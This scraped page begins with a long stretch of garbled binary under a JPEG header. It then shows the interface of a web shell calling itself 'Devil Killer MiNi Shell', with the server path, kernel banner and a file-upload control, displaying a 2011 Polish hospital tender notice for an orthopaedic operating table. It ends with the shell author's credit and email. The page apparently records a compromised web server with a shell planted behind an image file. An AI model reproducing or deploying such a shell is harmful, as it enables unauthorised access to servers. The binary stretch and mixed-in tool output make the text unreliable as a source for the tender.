JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111104/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111104/364918-N-2011.html

<p class="kh_header"><b>Oleśnica: Przedmiotem zamówienia jest dostawa fabrycznie nowego stołu operacyjnego z przystawką ortopedyczną dla Powiatowego Zespołu Szpitali w Oleśnicy.</b><br>
<b>Numer ogłoszenia: 364918 - 2011; data zamieszczenia: 04.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzsolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego stołu operacyjnego z przystawką ortopedyczną dla Powiatowego Zespołu Szpitali w Oleśnicy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego stołu operacyjnego z przystawką ortopedyczną dla Powiatowego Zespołu Szpitali w Oleśnicy.
Warunki jakie musi spełniać oferowany sprzęt:
1. Stół mobilny z blatem minimum pięciosegmentowym z napędem elektrycznym sterowany pilotem ręcznym z funkcją Trendelenburga, anty-Trendelenburga, zmiany wysokości, przechyłów bocznych, regulacji położenia części plecowej i przesuwu wzdłużnego oraz ustawienia pozycji 0
2. Zasilanie stołu sieciowe (230-240 V, 50 Hz) i akumulatorowe
3. Stół zasilany z akumulatora bezpiecznym napięciem, możliwość pracy podczas ładowania akumulatora - ładowarka wewnętrzna wbudowana zasilana napięciem 230-240 V.
4. Stół podczas normalnej pracy zasilany z akumulatorów wewnętrznych zapewniających ok. 1 tygodnia pracy. Czas ponownego naładowania akumulatorów max do 10 h. Możliwość pracy podczas ładowania akumulatorów.
5. Stół wyposażony w dwa wyłączniki napięcia zlokalizowane z prawej i lewej strony podstawy, możliwość dołączenia pilota nożnego.
6. Dodatkowy panel sterujący umieszczony z boku kolumny stołu z możliwością elektrycznego sterowania następującymi funkcjami: 
- góra/dół
- przechyły boczne
- pozycja anty- i Trendelenburga
- regulacja segmentu plecowego
- ustawienie pozycji 0 zabezpieczenie przed przypadkowym uruchomieniem pozycji 0 poprzez konieczność jednoczesnego naciśnięcia dwóch przycisków aktywujących
- panel wyposażony w diody świecące informujące o stanie naładowania akumulatorów
7. Blat 5-segmentowy z wycięciem ginekologicznym, z dzieloną sekcją nożną z możliwością jej opuszczania i podnoszenia. Część nożna dołączana za pomocą szybkozłączy z zatrzaskiem automatycznym. Część centralna z wycięciem ginekologicznym. Sekcja nożna musi posiadać możliwość rozchylenia na boki o min. 90 stopni. Część plecowa wyposażona w wypiętrzenie piersiowo-lędźwiowe regulowane mechanicznie.
8. Materace antystatyczne odporne na środki dezynfekcyjne
9. Segmenty przenikalne dla promieni RTG umożliwiające monitorowanie ramieniem C
10. Części konstrukcyjne blatu ze stali nierdzewnej
11. Elektromechaniczna regulacja wysokości blatu stołu - w dolnym położeniu max 670 do min 970 mm w górnym położeniu (+/- 5 mm)
12. Elektromechaniczna regulacja przechyłu bocznego +/- 25 stopni (+/- 5 stopni)
13. Elektromechaniczna regulacja pozycji Trendelenburga 30 stopni (+/- 5 stopni)
14. Elektromechaniczna regulacja pozycji anty-Trendelenburga 30 stopni (+/- 5 stopni)
15. Elektromechaniczna regulacja części plecowej w zakresie od -40 stopni do +70 stopni (+/- 2 stopnie)
16. Pneumatyczna regulacja części nożnej w zakresie -95 stopni / +25 stopni (+/- 5 stopni) oraz z możliwością odchylania na boki z blokadą mechaniczną
17. Pneumatyczna regulacja segmentu głowy w zakresie -50 stopni / +50 stopni (+/- 5 stopni) Płynna regulacja odchylenia segmentu głowy za pomocą sprężyny gazowej. Segment głowy dołączany za pomocą szybkozłączy z zatrzaskiem automatycznym
18. Elektromechaniczna regulacja przesuwu wzdłużnego blatu o 350 mm (+/-50mm)
19. Stół mobilny wyposażony w centralną blokadę kół z możliwością wyboru położenia - pozycja pełna blokada, pozycja do manewrowania, pozycja do jazdy na wprost sterowaną dźwignią nożną umieszczoną w podstawie stołu od strony głowy pacjenta. Cztery podwójne koła o średnicy minimum 120 mm
20. Wymiary stołu w zestawieniu standardowym: 
- minimalna długość 2100 mm
- minimalna szerokość leża (materaca) 530 mm
- maksymalna szerokość blatu stołu wraz z szynami akcesoryjnymi 600 mm
Bezpieczne robocze obciążenie stołu (waga pacjenta) min. 220 kg
Dopuszczalne maksymalne obciążenie stołu min. 350 kg
21. Podpórka anestezjologiczna ręki z zaciskiem / uchwytem mocującym z regulacją kąta ustawienia względem osi wzdłużnej stołu - 2 szt.
22. Ekran anestezjologiczny z zaciskiem - 1 szt.
23. Podpory podkolanowe z zaciskami mocującymi (para)  z regulacją wysokości i kąta nachylenia
24. Uchwyty uda/podudzia mocowane do szyn akcesoryjnych stołu - 2 szt.
25. Pas mocujący pacjenta z płynną regulacją długości, klamrą automatyczną, miękką wyściółką z zaciskami do szyn akcesoryjnych stołu - 1 szt.
26. Segment ortopedyczny wyciągowy dołączany do centralnej części blatu za pomocą szybkozłączy. Wykonany ze stali nierdzewnej. Belki wyciągowe dwuczęściowe łamane w poziomie z co najmniej dwoma przegubami na każdej z nich pozwalającymi na szeroki zakres  ich ustawień. Pierwszy przegub pozwalający na ustawienie kąta odchylenia belki wyciągowej względem osi wzdłużnej stołu do min. 90 stopni na wysokości podlędźwiowej drugi w odległości nie większej niż 50 cm od pierwszego pozwalający na ustawienie kąta odchylenia +/- 180 stopni. Dostępne regulacje pozwalające na takie ustawienie ramion wyciągu aby zapewnić podgląd ramieniem C na całej długości kończyny. Możliwość odchylenia belki wyciągowej o min. 270 stopni względem osi wzdłużnej stołu i zamocowania do niej wyciągu za rękę. Blokada przegubów za pomocą mechanizmu zębatkowego blokowanego za pomocą docisku mimośrodowego lub gwintowego. Ustawienie odległości mocowania stóp poprzez możliwość przesunięcia uchwytu wzdłuż belki wyciągowej lub możliwość skrócenia i wydłużenia belki oraz regulacja naciągu kończyny za pomocą korby mechanizmem gwintowym. Uchwyty stóp na przegubach kulowych z możliwością obrotu o 360 stopni dołączane za pomocą szybkozłącza z zatrzaskiem. Możliwość zmiany położenia podpory podlędźwiowej (wysunięcie na boki względem osi wzdłużnej stołu) w celu ułatwienia dostępu przy operacji biodra - 1 kpl
27. Bezpłatne szkolenie personelu z obsługi stołu w siedzibie Zamawiającego
28. Instrukcja obsługi w języku polskim (dostawa ze sprzętem)
29. Model z 2011 roku - fabrycznie nowy
30. Czas reakcji serwisu od zgłoszenia awarii (podjęcie naprawy) - nie dłuższy niż 48 godzin
31. Okres gwarancji od momentu dostawy i uruchomienia - co najmniej 36 miesięcy (obejmująca stół i osprzęt)
32. W trakcie okresu objętego gwarancją min. 1 bezpłatny przegląd stołu i przystawki ortopedycznej 
33. W razie naprawy trwającej dłużej niż 10 dni kalendarzowych Wykonawca ma obowiązek wstawienia stołu zastępczego o tych samych parametrach
34. Autoryzowany serwis gwarancyjny i pogwarancyjny zlokalizowany w miejscu zapewniającym wymagany przez Zamawiającego czas reakcji serwisu
35. Okres zagwarantowania dostępności części zamiennych od daty sprzedaży - co najmniej 10 lat
36. Dokumentacja techniczna urządzenia (dostawa ze sprzętem)
37.  Realizacja do 2 tygodni od podpisania umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.22.30-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunków posiadania wiedzy i doświadczenia Wykonawca ubiegający się o przedmiotowe zamówienie musi złożyć wraz z ofertą:
a) wykaz wykonanych dostaw, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te dostawy zostały wykonane należycie. Wzór wykazu wykonanych dostaw stanowi załącznik nr 6 do SIWZ.
Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)  Deklaracje zgodności CE producenta dot. oferowanego stołu operacyjnego
b) Do oferty należy dołączyć ilustrowane foldery producenta potwierdzające wymagane parametry techniczne urządzenia</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi również zawierać następujące dokumenty i oświadczenia:
a)  wypełnioną Kartę oceny spełniania warunków dot. przedmiotu zamówienia (załącznik nr 2 do SIWZ)
b) w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie
c) oświadczenie o spełnianiu warunków udziału w postępowaniu - według wzoru stanowiącego załącznik nr 4 do SIWZ
d) jeżeli odrębne przepisy nie wymagają wpisu do rejestru, do oferty należy dołączyć dokument, z którego będzie wynikało, że osoba, która podpisała ofertę jest upoważniona do reprezentowania firmy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Szpitali
ul. Armii Krajowej 1 
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2011 godzina 09:00, miejsce: Powiatowy Zespół Szpitali
ul. Armii Krajowej 1 
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com